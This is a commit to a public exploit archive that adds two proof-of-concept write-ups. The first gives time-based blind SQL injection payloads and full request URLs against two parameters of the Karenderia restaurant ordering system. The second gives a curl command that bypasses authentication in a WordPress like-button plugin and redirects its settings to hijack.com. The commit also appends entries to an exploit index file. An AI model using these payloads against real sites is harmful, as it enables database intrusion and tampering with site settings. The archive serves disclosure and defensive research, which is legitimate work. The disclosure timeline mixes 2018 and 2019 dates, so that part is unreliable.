DB: 2019-07-09

2 changes to exploits/shellcodes Karenderia Multiple Restaurant System 5.3 - SQL Injection WordPress Plugin Like Button 1.6.0 - Authentication Bypass
2019-07-09 05:02:18 +00:00 · 2019-07-09 05:02:18 +00:00 · 09258ea750
commit 09258ea750
parent 3f8a751f28
3 changed files with 94 additions and 0 deletions
--- a/exploits/php/webapps/47077.txt
+++ b/exploits/php/webapps/47077.txt
@ -0,0 +1,46 @@
 ===========================================================================================
 # Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln.
 # Dork: N/A
 # Date: 05-07-2019
 # Exploit Author: Mehmet EMIROGLU
 # Vendor Homepage: buyer2@codemywebapps.com
 # Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
 # Version: v5.3
 # Category: Webapps
 # Tested on: Wamp64, Windows
 # CVE: N/A
 # Software Description: Karenderia Multiple Restaurant System is a
 restaurant food ordering and restaurant membership system.
 ===========================================================================================
 # POC - SQLi (Blind)
 # Parameters : street-name
 # Attack Pattern :
 1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
 # GET Method :
 http://localhost/kmrs/searcharea?st=Los%20Angeles,%20CA,%20United%20States&street-name=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
 "XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/
 ===========================================================================================
 ###########################################################################################
 ===========================================================================================
 # Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln.
 # Dork: N/A
 # Date: 05-07-2019
 # Exploit Author: Mehmet EMIROGLU
 # Vendor Homepage: buyer2@codemywebapps.com
 # Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
 # Version: v5.3
 # Category: Webapps
 # Tested on: Wamp64, Windows
 # CVE: N/A
 # Software Description: Karenderia Multiple Restaurant System is a
 restaurant food ordering and restaurant membership system.
 ===========================================================================================
 # POC - SQLi (Blind)
 # Parameters : category
 # Attack Pattern :
 1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
 # GET Method :
 http://localhost/kmrs/store/cuisine/?category=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
 "XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/&page=2
 ===========================================================================================
--- a/exploits/php/webapps/47078.txt
+++ b/exploits/php/webapps/47078.txt
@ -0,0 +1,46 @@
 Exploit Title: WP Like Button 1.6.0 - Auth Bypass
 Date: 05-Jul-19
 Exploit Author: Benjamin Lim
 Vendor Homepage: http://www.crudlab.com
 Software Link: https://wordpress.org/plugins/wp-like-button/
 Version: 1.6.0
 CVE : CVE-2019-13344
 1. Product & Service Introduction:
 WP Like button allows you to add Facebook like button on your wordpress
 blog. You can also add Share button along with Like button or can add
 recommend button. As of now, the plugin has been downloaded 129,089 times
 and has 10,000+ active installs.
 2. Technical Details & Description:
 Authentication Bypass vulnerability in the WP Like Button (Free) plugin
 version 1.6.0 allows unauthenticated attackers to change the settings of
 the plugin. The contains() function in wp_like_button.php did not check if
 the current request is made by an authorized user, thus allowing any
 unauthenticated user to successfully update the settings of the plugin.
 3. Proof of Concept (PoC):
 For example, the curl command below allows an attacker to change the
 each_page_url parameter to https://hijack.com. This allows the attacker to
 hijack Facebook likes.
 curl -k -i --raw -X POST -d
 "page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=
 https://hijack.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb="
 "https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1"
 -H "Content-Type: application/x-www-form-urlencoded"
 4. Mitigation
 No update has been released by the vendor. Users are advised to switch to a
 different plugin.
 5. Disclosure Timeline
 2019/06/24 Vendor contacted regarding vulnerability in v1.5.0 (crudlab@gmail.com)
 2019/06/30 Second email sent to vendor (crudlab@gmail.com)
 2019/07/02 Vendor released v1.6.0 update. Vulnerability still exists.
 Vendor did not acknowledge any emails.
 2018/07/03 Third email sent to vendor's billing email domain (info@purelogics.net)
 2018/07/05 Public disclosure
 6. Credits & Authors:
 Benjamin Lim - [https://limbenjamin.com]
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -41408,6 +41408,7 @@ id,file,description,date,author,type,platform,port
 46931,exploits/multiple/webapps/46931.txt,"Deltek Maconomy 2.2.5 - Local File Inclusion",2019-05-27,JameelNabbo,webapps,multiple,
 46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,
 46936,exploits/php/webapps/46936.txt,"pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting",2019-05-29,"Chi Tran",webapps,php,
 47077,exploits/php/webapps/47077.txt,"Karenderia Multiple Restaurant System 5.3 - SQL Injection",2019-07-08,"Mehmet EMIROGLU",webapps,php,80
 46956,exploits/php/webapps/46956.txt,"KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities",2019-06-03,SlidingWindow,webapps,php,
 46957,exploits/hardware/webapps/46957.txt,"AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control",2019-06-03,Luca.Chiou,webapps,hardware,
 46958,exploits/php/webapps/46958.txt,"WordPress Plugin Form Maker 1.13.3 - SQL Injection",2019-06-03,"Daniele Scanu",webapps,php,
@ -41459,3 +41460,4 @@ id,file,description,date,author,type,platform,port
 47069,exploits/php/webapps/47069.py,"Centreon 19.04  - Remote Code Execution",2019-07-02,Askar,webapps,php,
 47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443
 47075,exploits/php/webapps/47075.txt,"Karenderia Multiple Restaurant System 5.3 - Local File Inclusion",2019-07-05,"Mehmet EMIROGLU",webapps,php,
 47078,exploits/php/webapps/47078.txt,"WordPress Plugin Like Button 1.6.0 - Authentication Bypass",2019-07-08,"Benjamin Lim",webapps,php,